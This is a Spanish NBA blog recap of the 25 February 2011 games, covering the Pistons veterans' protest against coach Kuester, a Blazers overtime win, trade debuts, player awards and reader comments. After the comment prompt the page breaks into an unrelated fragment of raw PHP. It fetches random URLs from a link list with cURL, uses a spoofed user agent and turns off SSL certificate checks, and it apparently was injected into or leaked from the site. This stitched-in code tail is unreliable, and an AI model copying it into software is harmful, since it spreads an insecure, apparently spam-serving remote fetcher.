Golpe de estado en los Pistons: La Crónica (25/02/2011)

26 de February de 2011 por txusma

Teníamos la intención de abrir con la definitiva vuelta a la normalidad en el debut de varios de los transferidos. Nada más lejos de la realidad. El boxscore del Detroit@Philadelphia denota algo raro a primera vista. Por los Pistons fueron de la partida Will Bynum, Ben Gordon, Villanueva, DeJuan Summers y Greg Monroe como titulares, más Jason Maxiell de sexto hombre. El resto de la plantilla DNP, desaparecidos en combate. Resulta especialmente interesante repasar los nombres de los ausentes. Las explicaciones oficiales de lo más variopintas, desde dolores de cabeza hasta problemas personales. En realidad, por lo que se publica en diversas fuentes, se trata de un pulso en toda regla de los veteranos contra John Kuester, la petición de su cabeza como por lo visto se les había prometido para el all-star y una protesta radical frente al inmovilismo de la franquicia en el periodo de traspasos. Los rebeldes se negaron a participar en la rueda de calentamiento y el técnico tiró de castigo. Vamos a ver en qué queda todo porque el asunto es de una gravedad máxima y en aquellos lares ya sabemos cómo se las gastan para cortar este tipo de cosas de raíz. Kuester, a todo esto se mostró más nervioso de lo habitual en el partido y terminó expulsado por doble técnica. Los Pistons, como no podía ser de otra manera, perdieron.

Nos hubiera gustado más abrir con la locura de espectáculo que nos ofrecieron Nuggets y Blazers. Las necesidades prepararon la fiesta. Con Gerald Wallace de espectador, McMillan no tuvo otra que sacar un small-ball a la palestra, con únicamente Aldridge como jugador interior disponible. Lo rodeó con Rudy, Matthews y Batum más Roy desde el banquillo. Karl recogió el guante porque tampoco tuvo otra, con Kenyon Martin enfermo, alineó a Gallinari y Chandler juntos con Affalo. Y de esta guisa nos encontramos en un intercambio de golpes que poco tienen que ver con las habituales partidas de damas del viejo Nate, para disfrute de los aficionados. El choque fue una ruleta rusa que parecía resolverse a favor de Denver a falta de medio minuto para el final. Un triplazo de Rudy y, sobre todo, otro apoteósico de Roy lo llevó a la prórroga que también se resolvió con una moneda al aire. Victoria impresionante de los Blazers, subiendo como la espuma.

Hubo reparto de suertes en el resto de equipos involucrados en los traspasos:

– Utah se reencontró por fin con la victoria en Indiana gracias a Al Jefferson en estado de gracia y un buen debut de Harris.
– Los Suns ganaron en Toronto, aunque no han incorporado todavía a Brooks.
– Los Bobcats no echaron excesivamente de menos las ausencias y brillaron contra los Kings, a pesar del buen debut de Thornton.
– El batacazo del día se lo llevaron Melo y los Knicks en Cleveland, mostrando sus carencias en cuanto a la profundidad de banco.
– Los Wizards fueron ajusticiados por Wade en Miami con pésimo debut de Bibby.
– Landry debutó con victoria con los Hornets en el establecimiento de récord por parte de Kevin Love.
– Los Thunder echaron de menos a sus nuevas incorporaciones ante Howard y sus Magic y el debut de Deron Williams tampoco sirvió para hacer que los Nets fueran capaz de ganar a los Spurs.
– Hinrich disfrutó de un gran partido de los Hawks ante los Warriors.

Para terminar los Lakers ganaron con cierta facilidad a sus vecinos, quienes ya podemos decir dicen adios a sus remotas opciones de postemporada si alguna vez las tuvieron.

PREMIOS

MVP: Con Perkins y Mohameed todo debería ser diferente pero anoche Dwight Howard sé cebó con el débil juego interior de los Thunder con 40 puntos y 15 rebotes. Otro que llegó a los 40 puntos fue Dwyane Wade que alcanzó los 41 para vencer a los Wizards.

Rookie: Buenos partidos tanto de Greg Monroe como de John Wall. El primero logró 16 puntos, 11 rebotes, 4 asistencias y 3 robos, mientras que segundo consiguió 24 puntos y 12 rebotes. Wesley Johnson celebró su retorno a la titularidad con 22 puntos.

Sorpresa: Ayer tocó el partido bueno de Nick Young. 38 puntos con 12 de 19 en tiros de campo. Mañana es capaz de anotar sólo 2 con un 1 de 10. Él es así.

Decepción: Tras unos buenos partidos, Tyler Hansbrough sólo fue capaz de anotar 1 de sus 11 lanzamientos. A ver si gana regularidad con el paso de los partidos.

Esfuerzo en vano: No todo iba a ser un camino de rosa en New York a partir de la llegada de Melo. Ayer cayeron ante el peor equipo de la liga a pesar de la buena actuación del anterior jefe del lugar, Amare Stoudamire, que se fue a los 31 puntos, 11 rebotes, 3 asistencias, 3 robos y 5 tapones.

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. TX dice:
    #1

    ¿Alguien sabe cómo puede solucionar Portland su falta de juego interior? Porque si tenemos que esperar hasta que se recupere Oden…
    Hoy Matthews ha acabado jugando de 4 y no le veo…. Batum y Babbit se las apañan mejor

      Citar

  2. scriers dice:
    #2

    Que ha pasado en los Pistons? mira que es un equipo al que le tengo simpatía, pero me la lían de mala manera…
    yo no se, por ejemplo, como mcgrady puede quejarse con este entrenador que le ha dado tantos minutos. Otro lo da por acabado. o Prince, no se…
    ustedes que sabeis… qué se comenta?

    ayer Portland se jugó las papas con roy rudy aldrige miller y mathews o batum. yo creo que wallacw jugara mucho de 4, no?

      Citar

  3. TheDeerHunter dice:
    #3

    Camby está a punto de volver.

      Citar

  4. inad23 dice:
    #4

    Ola soy un fiel seguidor de vuestro blog y me gustaria agradeceros todo el esfuerzo y todas las horas que haceis para manteneros a todos informados,la verdad es que es increible,nunca fallais…
    Me gustaria preguntaros donde podeis ver los partidos de la NBA por internet…..
    Gracias por todo el esfuerzo¡¡

      Citar

  5. -=TheKing=- dice:
    #5

    MMMMMMMmmm partidazo de Gortat, no teniamos un pivot tan solvente desde mmm desde mmmmm El gordo barkley???

      Citar

  6. TX dice:
    #6

    Pero con Camby solo tendrían un pívot puro, y si ponemos a Aldridge de 5 mientras Camby descansa… Demasiados minutos para Aldridge

      Citar

  7. sergio dice:
    #7

      Citar

  8. Denise dice:
    #8

    El asunto de Pistons acabará como siempre, las mimadas estrellas (acabadas todas) tiene razón y el malo de la pelicula es el coach que lo largarán a la p..calle.
    Sin ser pretencioso, no me sorprende lo de Gortat, yo siempre dije que potencialmente estamos hablando de un 14-10 por noche. Claro que teniendo a Howard, era una locura tenerlo en los Magic cobrando 7 kilos para jugar 10 minutos.

      Citar

  9. Txusma dice:
    #9

    Nos pusimon las manos en la cabeza cuando lo renovaron pero se ha demostrado q la idea no fue mala. Han podido traspasarlo y sacar algo a cambio

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>